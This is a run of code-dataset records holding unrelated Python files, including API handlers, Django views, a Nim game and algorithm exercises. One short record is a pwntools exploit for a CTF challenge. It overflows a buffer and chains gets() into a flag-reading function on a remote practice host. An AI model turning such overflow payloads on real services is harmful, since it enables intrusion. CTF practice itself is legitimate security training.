Define the input values, request code, api and function names for DB logging\n    input = {}\n    input['user_key'] = user_key\n    input['log_request'] = log_request\n    input['module_index'] = module_index\n\n    api = os.path.split(__file__)[1]\n    function = sys._getframe().f_code.co_name\n\n    input_list = [user_key, log_request, module_index]\n\n    # If the input contains special characters that cannot be used in DB or API parameters\n    for input_data in input_list:\n        status = check_text(\"input_db\", input_data)\n        if status == \"400\":\n            # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n            user_id = None\n            log_status = \"ERROR\"\n            output = \"\"\n            message = \"Input data include special character\"\n            success_flag = \"N\"\n\n            # log : function that stores the log in the DB\n            # log_db : the log record stored in the DB\n            log_db = log(user_id, 
log_status, log_request, api, function, input, output, message, success_flag)\n            logger.error(message, extra=logger_data)\n            logger.error(log_db, extra=logger_data)\n\n            data = []\n            result = \"fail\"\n            status = \"404\"\n\n            # set_send : formats the API output (renames id/password fields, converts date formats, etc.)\n            send = set_send(data, result, status)\n            logger.error(send, extra=logger_data)\n\n            return send\n\n    # Look up the user's ID and authority from the given user key\n    send = get_user_info_from_key(user_key)\n    logger.info(\"Get user information\", extra=logger_data)\n\n    # If the user is not logged in\n    if send['status'] == \"201\":\n        # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n        user_id = None\n        log_status = \"ERROR\"\n        output = \"\"\n        message = \"User need login\"\n        success_flag = \"N\"\n\n        # log : function that stores the log in the DB\n        # log_db : the log record stored in the DB\n        log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n        logger.error(message, extra=logger_data)\n        logger.error(log_db, extra=logger_data)\n\n        data = []\n        result = \"fail\"\n        status = \"400\"\n\n        # set_send : formats the API output (renames id/password fields, converts date formats, etc.)\n        send = set_send(data, result, status)\n        logger.error(send, extra=logger_data)\n\n        return send\n\n    # If a DB error occurred while checking the login status\n    elif send['status'] == \"400\":\n        # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n        user_id = None\n        log_status = \"EXCEPTION\"\n        output = \"\"\n        message = send['data'][0]['error']\n        success_flag = \"N\"\n\n        # log : function that stores the log in the DB\n        # log_db : the log record stored in the DB\n        log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n        logger.error(message, extra=logger_data)\n        logger.error(log_db, extra=logger_data)\n\n        data = []\n        result = \"fail\"\n        status = \"401\"\n\n        # set_send : formats the API output (renames id/password fields, converts date formats, etc.)\n        send = set_send(data, result, status)\n        logger.error(send, extra=logger_data)\n\n        return send\n\n    # If the user is currently logged in\n    elif send['status'] == \"200\":\n        # Check whether the requesting user is the author\n\n        # ID of the user who called the API\n        user_id = send['data'][0]['result_data_1']\n\n        engine = create_engine(db_data)\n        connection = engine.raw_connection()\n        cursor = connection.cursor()\n\n        # Call the stored procedure that fetches the module details\n        try:\n            # This lookup only checks authorship, so the view count is not incremented\n            count_click = \"N\"\n            cursor.callproc('SP_KEYM_GET_MODULE_DETAILS_INFO', [module_index, count_click])\n\n            column_names_list = [x[0] for x in cursor.description]\n\n            result_module_info = []\n\n            for row in cursor.fetchall():\n                result_module_info.append(dict(zip(column_names_list, row)))\n\n            # If no module exists for the given index (e.g. the module post was deleted)\n            if not result_module_info:\n                # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n                user_id = None\n                log_status = \"ERROR\"\n                output = \"\"\n                message = \"Module post does not exist\"\n                success_flag = \"N\"\n\n                # log : function that stores the log in the DB\n                # log_db : the log record stored in the DB\n                log_db = log(user_id, log_status, log_request, api, function, input, output, message,\n                    success_flag)\n                logger.error(message, extra=logger_data)\n                logger.error(log_db, extra=logger_data)\n\n                data = []\n                result = \"fail\"\n                status = \"405\"\n\n                # set_send : formats the API output (renames id/password fields, converts date formats, etc.)\n                send = set_send(data, result, status)\n                logger.error(send, extra=logger_data)\n\n                return send\n\n            # Files that were initialised to None earlier are reported as \"N\"\n            for module_info in result_module_info:\n                if module_info['FILE_EXIST_FLAG'] is None:\n 
module_info['FILE_EXIST_FLAG'] = \"N\"\n\n            # ID of the user who registered the module\n            user_id_module = result_module_info[0]['FK_KMMITN_MODULEINFO']\n            logger.info(\"Verify that the user and author match\", extra=logger_data)\n\n            # Check whether the requesting user is the author\n            if user_id != user_id_module:\n                logger.info(\"User and author do not match\", extra=logger_data)\n                id_equal_flag = \"N\"\n            else:\n                logger.info(\"User and author match\", extra=logger_data)\n                id_equal_flag = \"Y\"\n\n            # Authority list of the user viewing the module\n            user_auth_list = send['data'][0]['AUTH']\n\n            request_auth = \"\"\n            # Module details view 'LGMOD0001'\n            if log_request == \"LGMOD0001\":\n                request_auth = 'AUMOD0001'\n                count_click = \"Y\"\n            # Module edit 'LGMOD0003'\n            elif log_request == \"LGMOD0003\":\n                request_auth = 'AUMOD0003'\n                count_click = \"N\"\n\n            auth_exist_flag = \"\"\n            logger.info(\"Check authority\", extra=logger_data)\n            # Check for module view or edit authority\n            for auth in user_auth_list:\n                if auth == request_auth:\n                    logger.info(\"Authority exists\", extra=logger_data)\n                    auth_exist_flag = \"Y\"\n                    break\n                else:\n                    auth_exist_flag = \"N\"\n\n            # A view request without the view authority is rejected\n            if log_request == \"LGMOD0001\":\n                if auth_exist_flag == \"N\":\n\n                    # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n                    user_id = None\n                    log_status = \"ERROR\"\n                    output = \"\"\n                    message = \"You do not have permission\"\n                    success_flag = \"N\"\n\n                    # log : function that stores the log in the DB\n                    # log_db : the log record stored in the DB\n                    log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n                    logger.error(message, extra=logger_data)\n                    logger.error(log_db, extra=logger_data)\n\n                    data = []\n                    result = \"fail\"\n                    status = \"402\"\n\n                    # set_send : formats the API output (renames id/password fields, converts date formats, etc.)\n                    send = set_send(data, result, status)\n                    logger.error(send, extra=logger_data)\n\n                    return send\n\n                # If authorised, increment the view count\n                else:\n                    # Re-fetch the details after incrementing the view count\n                    cursor.callproc('SP_KEYM_GET_MODULE_DETAILS_INFO', [module_index, count_click])\n\n                    column_names_list = [x[0] for x in cursor.description]\n\n                    result_module_info = []\n\n                    for row in cursor.fetchall():\n                        result_module_info.append(dict(zip(column_names_list, row)))\n\n            # An edit request is rejected when the user is neither the author nor authorised (either one suffices)\n            elif log_request == \"LGMOD0003\":\n                if id_equal_flag == \"N\" and auth_exist_flag == \"N\":\n                    # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n                    user_id = None\n                    log_status = \"ERROR\"\n                    output = \"\"\n                    message = \"You do not have permission\"\n                    success_flag = \"N\"\n\n                    # log : function that stores the log in the DB\n                    # log_db : the log record stored in the DB\n                    log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n                    logger.error(message, extra=logger_data)\n                    logger.error(log_db, extra=logger_data)\n\n                    data = []\n                    result = \"fail\"\n                    status = \"402\"\n\n                    # set_send : formats the API output (renames id/password fields, converts date formats, etc.)\n                    send = set_send(data, result, status)\n                    logger.error(send, extra=logger_data)\n\n                    return send\n\n            result_module_info[0]['id_equal_flag'] = id_equal_flag\n\n            data = result_module_info\n\n            # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n            user_id = None\n            log_status = \"REQUEST\"\n            output = data\n            message = \"get_module_info success\"\n            success_flag = \"Y\"\n\n            # log : function that stores the log in the DB\n            # log_db : the log record stored in the DB\n            log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n            logger.info(message, extra=logger_data)\n            logger.debug(log_db, extra=logger_data)\n\n            result 
= \"success\"\n status = \"200\"\n\n # set_send : API 출력값 정렬 함수(아이디, 비밀번호 변수명 변경, 날짜 정보 형태 타입 변경 등)\n send = set_send(data, result, status)\n logger.debug(send, extra=logger_data)\n\n return send\n\n except Exception as e:\n print(\"error type : \", type(e))\n print(\"error : \", e)\n\n # user_id, log_status, log_request, api, function, input, output, message, success_flag, display_flag\n user_id = None\n log_status = \"EXCEPTION\"\n output = \"\"\n message = \"exception error\"\n success_flag = \"Y\"\n\n # log : DB 에 로그를 저장하는 함수\n # log_db : DB 에 저장한 로그값\n log_db = log(user_id, log_status, log_request, api, function, input, output, message, success_flag)\n logger.error(message, extra=logger_data)\n logger.error(log_db, extra=logger_data)\n\n data = []\n status = '403'\n result = \"fail\"\n\n # set_send : API 출력값 정렬 함수(아이디, 비밀번호 변수명 변경, 날짜 정보 형태 타입 변경 등)\n send = set_send(data, result, status)\n logger.error(send, extra=logger_data)\n\n return send\n\n finally:\n connection.close()","sub_path":"AUMOD/get_module_info.py","file_name":"get_module_info.py","file_ext":"py","file_size_in_byte":14176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"174776312","text":"from kivy.event import EventDispatcher\nfrom kivy.properties import ListProperty\nfrom kivy.storage.jsonstore import JsonStore\n\n\nclass Storage(EventDispatcher):\n\n store = ListProperty()\n json_store = JsonStore('storage.json')\n\n instants = [\n 'Drink',\n 'Flush',\n 'Washing Clothes',\n 'Other'\n ]\n\n quantity_based = [\n 'Washing Dishes',\n 'Washing Clothes (manually)',\n 'Watering Plants'\n ]\n\n time_based = [\n 'Showering'\n ]\n\n def __init__(self):\n for key in self.json_store.keys():\n entity = self.json_store.get(key)\n self.store.append(entity)\n\n\nstorage = Storage()\n","sub_path":"storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"256788251","text":"from Manager import Manager\n\n\ndef start():\n exit = True\n\n while exit:\n\n menu()\n option = get_option()\n exit = execute_menu(option)\n\n\ndef menu():\n print(\"____________Menu principal____________\\n\")\n print(\"1. Agregar datos en una estructura\\n\")\n print(\"2. Mover datos en una estructura\\n\")\n print(\"3. Eliminar datos en una estructura\\n\")\n print(\"4. Mostrar datos de una estructura\\n\")\n print(\"0. 
Salir\\n\")\n print(\"______________________________________\\n\")\n\n\ndef get_option():\n\n option = input(\"Digite una opcion: \")\n\n return option\n\n\ndef execute_menu(option):\n exit = True\n operation = \"\"\n\n if option == \"1\":\n operation = \"Add\"\n add_move_delete_show_menu(operation)\n option = get_option()\n execute_add_move_delete_show(option, operation)\n\n elif option == \"2\":\n\n operation = \"Move\"\n add_move_delete_show_menu(operation)\n option = get_option()\n execute_add_move_delete_show(option, operation)\n\n elif option == \"3\":\n\n operation = \"Delete\"\n add_move_delete_show_menu(operation)\n option = get_option()\n execute_add_move_delete_show(option, operation)\n\n elif option == \"4\":\n\n operation = \"Show\"\n add_move_delete_show_menu(operation)\n option = get_option()\n execute_add_move_delete_show(option, operation)\n\n elif option == \"0\":\n\n exit = False\n print(\"Gracias...\")\n\n else:\n print(\"*Opcion invalida*\")\n\n return exit\n\n\ndef add_move_delete_show_menu(operation):\n operation = get_ES_name(operation)\n\n print(\"____________\" + operation + \" datos____________\\n\")\n print(\"1. En una lista\\n\")\n print(\"2. En una pila\\n\")\n print(\"3. En una cola\\n\")\n print(\"4. En un arbol binario\\n\")\n print(\"5. En un arbol AVL\\n\")\n print(\"0. <-\\n\")\n print(\"______________________________________\")\n\n\ndef get_ES_name(operation):\n if operation == \"Add\":\n return \"Agregar\"\n elif operation == \"Move\":\n return \"Mover\"\n elif operation == \"Delete\":\n return \"Eliminar\"\n else:\n return \"Mostrar\"\n\n\ndef execute_add_move_delete_show(option, operation):\n strcuk_type = \"\"\n\n if option == \"1\":\n strcuk_type = \"lista\"\n execute_operation(operation, strcuk_type)\n\n elif option == \"2\":\n strcuk_type = \"pila\"\n execute_operation(operation, strcuk_type)\n\n elif option == \"3\":\n strcuk_type = \"cola\"\n execute_operation(operation, strcuk_type)\n\n elif option == \"4\":\n strcuk_type = \"arbol binario\"\n execute_operation(operation, strcuk_type)\n\n elif option == \"5\":\n strcuk_type = \"arbol AVL\"\n execute_operation(operation, strcuk_type)\n\n elif option == \"0\":\n pass\n\n else:\n print(\"Opcion invalida\")\n\n\ndef execute_operation(operation, struck_type):\n num = 0\n\n if operation == \"Add\" or operation == \"Delete\" or operation == \"Move\":\n\n if operation == \"Add\":\n\n num = get_input()\n print(str(Manager.add_item(num, struck_type)))\n\n elif operation == \"Move\":\n movement_op(struck_type)\n\n else:\n if struck_type == \"lista\" or struck_type == \"arbol binario\" or struck_type == \"arbol AVL\":\n num = get_input()\n print(str(Manager.delete_item(num, struck_type)))\n else:\n num = 0\n print(str(Manager.delete_item(num, struck_type)))\n else:\n print(str(Manager.show_item(struck_type)))\n\n\ndef movement_op(struck_type):\n movement_menu(struck_type)\n option = get_option()\n move_to(option, struck_type)\n\n\ndef movement_menu(struck_type):\n print(\"______________________________________\\n\")\n if struck_type == \"lista\":\n print(\"2. Mover a una pila\\n\")\n print(\"3. Mover a una cola\\n\")\n print(\"4. Mover a un arbol\\n\")\n print(\"5. Mover a un arbol AVL\\n\")\n\n elif struck_type == \"pila\":\n print(\"1. Mover a una lista\\n\")\n print(\"3. Mover a una cola\\n\")\n print(\"4. Mover a un arbol\\n\")\n print(\"5. Mover a un arbol AVL\\n\")\n\n elif struck_type == \"cola\":\n print(\"1. Mover a una lista\\n\")\n print(\"2. Mover a una pila\\n\")\n print(\"4. 
Mover a un arbol\\n\")\n        print(\"5. Mover a un arbol AVL\\n\")\n\n    elif struck_type == \"arbol binario\":\n        print(\"1. Mover a una lista\\n\")\n        print(\"2. Mover a una pila\\n\")\n        print(\"3. Mover a una cola\\n\")\n        print(\"5. Mover a un arbol AVL\\n\")\n\n    elif struck_type == \"arbol AVL\":\n        print(\"1. Mover a una lista\\n\")\n        print(\"2. Mover a una pila\\n\")\n        print(\"3. Mover a una cola\\n\")\n        print(\"4. Mover a un arbol\\n\")\n        print(\"______________________________________\")\n\n\ndef move_to(option, struck_type):\n\n    print(\"\\n\" + str(Manager.show_item(struck_type)) + \"\\n\")\n    print(\"Numeros a mover\\n\")\n    num = get_input()\n\n    if(Manager.move_item(num, struck_type) is True):\n\n        if(option == \"1\"):\n            strcuk_typ = \"lista\"\n            print(str(Manager.add_item(num, strcuk_typ)) + \"\\n\")\n        elif(option == \"2\"):\n            strcuk_typ = \"pila\"\n            print(str(Manager.add_item(num, strcuk_typ)) + \"\\n\")\n        elif(option == \"3\"):\n            strcuk_typ = \"cola\"\n            print(str(Manager.add_item(num, strcuk_typ)) + \"\\n\")\n        elif(option == \"4\"):\n            strcuk_typ = \"arbol binario\"\n            print(str(Manager.add_item(num, strcuk_typ)) + \"\\n\")\n        elif(option == \"5\"):\n            strcuk_typ = \"arbol AVL\"\n            print(str(Manager.add_item(num, strcuk_typ)) + \"\\n\")\n        else:\n            print(\"*** Opcion invalida ***\")\n    else:\n        print(\"*** Error al mover ***\")\n\n\ndef get_input():\n\n    success = True\n\n    while success:\n        try:\n            option = int(input(\"Digite el numero: \"))\n            success = False\n\n        except ValueError:\n            print(\"El numero debe ser entero\")\n\n    return option\n\n\nif __name__ == \"__main__\":\n    start()\n","sub_path":"repaso.py","file_name":"repaso.py","file_ext":"py","file_size_in_byte":6059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"467481193","text":"import inspect\n\n\ndef viewable(fnc):\n    '''\n    Decorator, mark a function as viewable and gather some metadata in the process\n\n    '''\n    def get_method_args(func):\n        '''\n        Return the method's defined arguments\n\n        :param: func: Function to analyze\n        :type: function\n\n        :returns: A dictionary with the required and optional arguments\n        :rtype: dictionary\n        '''\n        func_args = inspect.getfullargspec(func)\n        if func_args.defaults is not None:\n\n            optional_len = len(func_args.defaults)\n\n            func_required = func_args.args[:-optional_len]\n            func_optional = dict(\n                zip(func_args.args[-optional_len:], func_args.defaults))\n\n        else:\n            func_required = func_args.args\n            func_optional = {}\n\n        func_required = [\n            args for args in func_required if args not in ('cls', 'self')]\n        return func_required, func_optional\n    \n    def call(*pargs, **kwargs):\n        return fnc(*pargs, **kwargs)\n\n    # Mark the function as viewable\n    call.is_viewable = True\n    # Collect metadata about the required and optional arguments\n    required, optional = get_method_args(fnc)\n    call.required_args = required\n    call.optional_args = optional\n    # Get the function documentation\n    call.doc = inspect.getdoc(fnc) or \"\"\n    # Return the wrapper function\n    return call\n\n\nclass BaseController(object):\n    '''\n    Base class controller. 
Exposes one single default action\n '''\n\n @viewable\n def index(self):\n '''\n Default controller method.\n '''\n return ''\n\n\nclass HelloController(BaseController):\n '''\n Sample Controller Class 1\n '''\n\n def __init__(self):\n self.price_per_unit = 5\n\n @viewable\n def say_hello(self, name, first_time=True):\n '''\n Return a message saying Hello\n\n :param: name: Clients name\n :type: string\n\n :param: first_time: determine if this is the first visit\n :type: string\n\n :returns: A hello message\n :rtype: string\n '''\n if first_time:\n return \"Hello {}.\\nNice to meet you.\".format(name)\n else:\n return \"Hello {}.\\nWelcome back.\".format(name)\n\n @viewable\n def take_order(self, product, quantity):\n '''\n Take an order and return a thank you message\n\n :param: product: Product to purchase\n :type: string\n\n :param: quantity: number of goods to purchase\n :type: int \n\n :returns: A thank you message\n :rtype: string\n\n '''\n response_format = \"Thank you.\\nYou have ordered {} {}.\\nThat would be {}$ please.\"\n response = response_format.format(\n quantity,\n product,\n quantity * self.price_per_unit)\n return response\n\n def _protected_method(self):\n '''\n This method is protected and should not be exposed\n '''\n return \"Please don't!\"\n\n\nclass GoodByeController(BaseController):\n '''\n Sample Controller class 2\n '''\n\n @viewable\n def say_goodbye(self, nice=True):\n '''\n Return a message saying GoodBye\n\n :param: nice: Determine if the answer should be nice\n :type: boolean\n\n :returns: A string message saying goodbye\n :rtype: string\n '''\n if nice:\n return \"Goodbye. It was a pleasure.\"\n else:\n return \"Get the hell out of here.\"\n\n @viewable\n def kick(self):\n '''\n Self explanatory\n\n :returns: A string message saying you should be careful\n :rtype: string\n '''\n return \"Someone's butt is about to get kicked.\"\n\n def public_method(self):\n '''\n This method is public, yet should not be exposed\n '''\n return \"Please don't!\"\n","sub_path":"blog_source_code/exposing_class_as_webservice/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"454520443","text":"from django.shortcuts import render, redirect\nfrom django.views.generic.base import View\n\nfrom util.mixin_utils import LoginRequiredMixin\nfrom .models import Org, CityDict, Author\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom .form import UserAskForm\nfrom django.http import HttpResponse\nfrom operation.models import UserFavorite\nfrom blogs.models import Blogs\n\n\n# Create your views here.\nclass OrgListView(View):\n def get(self, request):\n # 组织\n all_orgs = Org.objects.all()\n top_orgs = all_orgs.order_by('click_nums')[:3]\n # 作者\n all_author = Author.objects.all()\n authors = all_author.order_by('-click_nums')[:3]\n # 城市\n all_citys = CityDict.objects.all()\n # 城市筛选\n city_id = request.GET.get('city', '')\n if city_id:\n all_orgs = all_orgs.filter(city_id=int(city_id))\n # 类别筛选\n category = request.GET.get('ct', '')\n if category:\n all_orgs = all_orgs.filter(category=category)\n\n sort = request.GET.get('sort', '')\n if sort:\n if sort == 'fav_nums':\n all_orgs = all_orgs.order_by('-fav_nums')\n elif sort == 'click_nums':\n all_orgs = all_orgs.order_by('-click_nums')\n\n org_nums = all_orgs.count()\n # 分页\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n\n p = Paginator(all_orgs, 
2, request=request)\n orgs = p.page(page)\n\n return render(request, 'org_list.html', {\n \"all_orgs\": orgs,\n 'all_citys': all_citys,\n 'org_nums': org_nums,\n 'city_id': city_id,\n 'category': category,\n 'top_orgs': top_orgs,\n 'sort': sort,\n 'authors':authors,\n })\n\n\nclass AddUserAskView(View):\n # 用户添加咨询\n def post(self, request):\n userask_form = UserAskForm(request.POST)\n if userask_form.is_valid():\n user_ask = userask_form.save(commit=True)\n return HttpResponse(\"{'status':'success'}\", content_type='application/json')\n else:\n return HttpResponse(\"{'status':'fail','msg':{0}}\".format(userask_form.errors))\n\n\nclass OrgDetailView(View):\n #组织详情\n def get(self, request, org_id):\n all_orgs = Org.objects.all()\n top_orgs = all_orgs.order_by('click_nums')[:3]\n top_blogs=Blogs.objects.all()\n blogs=top_blogs.order_by('click_nums')[:3]\n blog_org = Org.objects.get(id=int(org_id))\n\n blog_org.click_nums+=1\n blog_org.save()\n\n favs=UserFavorite.objects.filter(fav_id=int(org_id),fav_type=2)\n all_blogs = blog_org.blogs_set.all()\n all_authors = blog_org.author_set.all()\n return render(request, 'org_detail.html', {\n 'all_blogs': all_blogs,\n 'all_authors': all_authors,\n 'blog_org': blog_org,\n 'favs':favs,\n 'top_orgs':top_orgs,\n 'blogs':blogs\n })\n\nclass AuthorView(View):\n def get(self, request, author_id):\n #热门博客\n all_blogs = Blogs.objects.all()\n top_blogs = all_blogs.order_by('-click_nums')[:3]\n # 热门组织\n all_orgs = Org.objects.all()\n top_orgs = all_orgs.order_by('click_nums')[:3]\n #收藏状态\n favs = UserFavorite.objects.filter(fav_id=int(author_id), fav_type=3)\n\n if int(author_id)>0:\n author=Author.objects.get(id=int(author_id))\n blogs=Blogs.objects.filter(author=author)\n return render(request, 'author.html', {\n 'author':author,\n 'author_id':int(author_id),\n 'blogs':blogs,\n 'favs': favs,\n 'top_blogs':top_blogs,\n 'top_orgs':top_orgs,\n })\n else:\n authors=Author.objects.all()\n return render(request, 'author.html', {\n 'authors': authors,\n 'author_id': int(author_id),\n 'top_blogs': top_blogs,\n 'top_orgs': top_orgs,\n })\n\nclass AddFavView(LoginRequiredMixin,View):\n def post(self, request):\n org_id = request.POST.get('org_id', '')\n #收藏编号\n fav_id = request.POST.get('fav_id', '')\n #收藏类型\n fav_type = request.POST.get('fav_type', '')\n\n exist_records = UserFavorite.objects.filter(user=request.user, fav_id=int(fav_id), fav_type=int(fav_type))\n if exist_records:\n exist_records.delete()\n if int(fav_type)==3:\n author = Author.objects.get(id=int(fav_id))\n author.fav_nums -= 1\n if author.fav_nums < 0:\n author.fav_nums = 0\n author.save()\n author_id = org_id\n return redirect('org:author', author_id)\n elif int(fav_type)==2:\n org=Org.objects.get(id=int(fav_id))\n org.fav_nums-=1\n if org.fav_nums<0:\n org.fav_nums=0\n org.save()\n return redirect('org:detail', org_id)\n elif int(fav_type)==1:\n blog=Blogs.objects.get(id=int(fav_id))\n blog.fav_nums-=1\n if blog.fav_nums<0:\n blog.fav_nums=0\n blog.save()\n blog_id=org_id\n return redirect('blogs:blog_detail', blog_id)\n else:\n user_fav = UserFavorite()\n if int(fav_id) > 0 and int(fav_type) > 0:\n user_fav.fav_id = int(fav_id)\n user_fav.user_id=request.user.id\n user_fav.fav_type=int(fav_type)\n user_fav.save()\n if int(fav_type) == 3:\n author = Author.objects.get(id=int(fav_id))\n author.fav_nums += 1\n author.save()\n author_id = org_id\n return redirect('org:author', author_id)\n elif int(fav_type) == 2:\n org = Org.objects.get(id=int(fav_id))\n org.fav_nums += 1\n org.save()\n return 
redirect('org:detail',org_id)\n            elif int(fav_type) == 1:\n                blog = Blogs.objects.get(id=int(fav_id))\n                blog.fav_nums += 1\n                blog.save()\n                blog_id = org_id\n                return redirect('blogs:blog_detail', blog_id)\n        else:\n            if int(fav_type) == 3:\n                return render(request, 'author.html')\n            elif int(fav_type) == 2:\n                return render(request, 'org_detail.html')\n            elif int(fav_type) == 1:\n                return render(request, 'blog_detail.html')","sub_path":"apps/organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"649971041","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\n\n\nclass Scatterer(object):\n\n    def __init__(self, color, marker, title):\n        self.color = color\n        self.marker = marker \n        \n        self.fig = plt.figure(figsize=(8,8))\n        self.ax = self.fig.add_subplot(1, 1, 1)\n        plt.legend()\n        # Axes.hold was removed in matplotlib 3.0; overlaying artists is now the default behaviour\n        self.ax.set_title(title, fontsize=20, fontname=\"serif\")\n\n        plt.ion()\n        plt.show(block=False)\n        plt.draw()\n\n    def scatter(self, x, y):\n        self.ax.scatter([x], [y], color=self.color, marker=self.marker)\n\n        plt.pause(0.001)\n\n","sub_path":"Scatterer.py","file_name":"Scatterer.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"417821562","text":"import heapq\n\nclass Solution(object):\n    def getSkyline(self, buildings):\n        \"\"\"\n        :type buildings: List[List[int]]\n        :rtype: List[List[int]]\n        \"\"\"\n        # Only the left and right edges of each building can change the skyline, so record just those\n        path = []\n        for l, r, h in buildings:\n            path.append((l, - h, r))\n            path.append((r, 0, 0))\n        \n        # Sort so we sweep left to right, and at equal x the tallest building is visited first\n        path = sorted(path)\n        # print path\n        \n        # Min-heap keyed on (negative height, right edge), so the tallest live building is on top\n        hi_q = [(0, float('inf'))]\n        \n        # Result list, seeded with one element so result[-1] is always valid\n        result = [[0, 0]]\n        for x, neg_h, r in path:\n            # Pop buildings whose right edge is at or to the left of the current x (expired)\n            while hi_q[0][1] <= x:\n                heapq.heappop(hi_q)\n            \n            # Left edge of a building (right edges have neg_h == 0)\n            if neg_h:\n                heapq.heappush(hi_q, [neg_h, r])\n            \n            # Record a key point whenever the current max height differs from the last recorded one\n            if result[-1][1] + hi_q[0][0]:\n                result.append([x, - hi_q[0][0]])\n        return result[1:]\n        \n","sub_path":"算法面试题汇总/6树/4天际线问题-借鉴别人的.py","file_name":"4天际线问题-借鉴别人的.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"619120739","text":"from pwn import * \nr = remote('node3.buuoj.cn',28998)\nelf = ELF('pwnme2')\ngets_plt = elf.plt['gets']\nstring = 0x804A060\nfuck_func = 0x80485CB\npayload = 'a'*0x70+p32(gets_plt)+p32(fuck_func)+p32(string)\nr.sendline(payload)\nr.sendline('/flag')\nr.interactive()","sub_path":"pwn/cmcc_pwnme2/fuck.py","file_name":"fuck.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"513714329","text":"pontos_computador = 0\npontos_usuario = 0\ndef campeonato():\n    \n    print(\"##### PARTIDA 01 #####\")\n    partida()\n    print(\"##### PARTIDA 02 #####\")\n    partida()\n    print(\"##### PARTIDA 03 #####\")\n    partida()\n    \n    if pontos_usuario > pontos_computador:\n        print(\"Você venceu o campeonato por {}x{}\".format(pontos_usuario,pontos_computador))\n    else:\n        print(\"Você perdeu o campeonato por {}x{}\".format(pontos_computador,pontos_usuario))\n\ndef partida():\n    global pontos_computador\n    global pontos_usuario\n    \n    qnt_pecas = 
set_pecas()\n lmt_pecas_possivel = set_limite_pecas()\n \n if qnt_pecas % (lmt_pecas_possivel + 1) == 0 :\n print(\"Voce comeca!\")\n auxUsuario = True\n else:\n print(\"Computador comeca!\")\n auxUsuario = False\n \n while qnt_pecas > 0:\n if auxUsuario:\n #usuario joga\n qnt_pecas -= usuario_escolhe_jogada(qnt_pecas, lmt_pecas_possivel)\n if qnt_pecas == 0:\n print(\"Você venceu!\")\n pontos_usuario+=1\n break\n print(\"Sobraram {} peças na mesa.\".format(qnt_pecas))\n auxUsuario = not auxUsuario\n else:\n #computador joga\n print(\"Jogada do computador.\")\n qnt_pecas -= computador_escolhe_jogada(qnt_pecas, lmt_pecas_possivel)\n if qnt_pecas == 0:\n print(\"O computador venceu!\")\n pontos_computador+=1\n break\n print(\"Sobraram {} peças na mesa.\".format(qnt_pecas))\n auxUsuario = not auxUsuario\n\ndef set_pecas():\n return int(input(\"Quantas pecas?\"))\n\ndef set_limite_pecas():\n return int(input(\"Limite de pecas por jogada?\"))\n\ndef usuario_escolhe_jogada(n,m):\n qnt_usuario_remove=int(input(\"Quantas pecas deseja tirar ?\"))\n '''\n if nm:\n print(\"Valor invalido ! Voce pode tirar no maximo {} pecas\".format(m))\n qnt_usuario_remove = usuario_escolhe_jogada(n,m)\n '''\n if qnt_usuario_remove > m or qnt_usuario_remove > n:\n print(\"Valor invalido ! Voce pode tirar no maximo {} pecas\".format(m))\n qnt_usuario_remove = usuario_escolhe_jogada(n,m)\n \n print(\"O usuario removeu {} pedras da mesa\".format(qnt_usuario_remove))\n return qnt_usuario_remove\n\ndef computador_escolhe_jogada(qnt_pecas,limite_pecas_jogada):\n if limite_pecas_jogada == 1:\n return 1\n for i in range(1,limite_pecas_jogada+1,1):\n if (qnt_pecas-i) % (limite_pecas_jogada+1) == 0:\n print(\"O computador removeu {} pecas do tabuleiro\".format(i))\n return i\n\nprint(\"Bem-Vindo ao jogo do Nim\\n\\n\")\nmodo_jogo=int(input(\"1- Para jogar uma partida isolada\\n2- Para jogar um campeonato\\n\"))\nif modo_jogo == 1:\n partida()\nif modo_jogo == 2:\n campeonato()","sub_path":"ExerciciosPython/jogoDoNim.py","file_name":"jogoDoNim.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"178522197","text":"#!/usr/bin/python\nclass Solution(object):\n\tcounter = 0\n\tdef pathSum(self, root, sum):\n\t\tif not root:\n\t\t\treturn self.counter\n\t\tif root:\n\t\t\tself.helper(root, sum)\n\t\treturn self.counter\n\t\t\n\t\n\tdef helper(self, node, target):\n\t\tif not node.left and not node.right:\n\t\t\tif node.val == target:\n\t\t\t\tself.counter += 1\n\t\t\treturn [node.val]\n\t\tleft,right = [], []\n\t\tif node.left:\n\t\t\tleft = self.helper(node.left,target)\n\t\tif node.right:\n\t\t\tright = self.helper(node.right,target)\n\t\tpathSum = 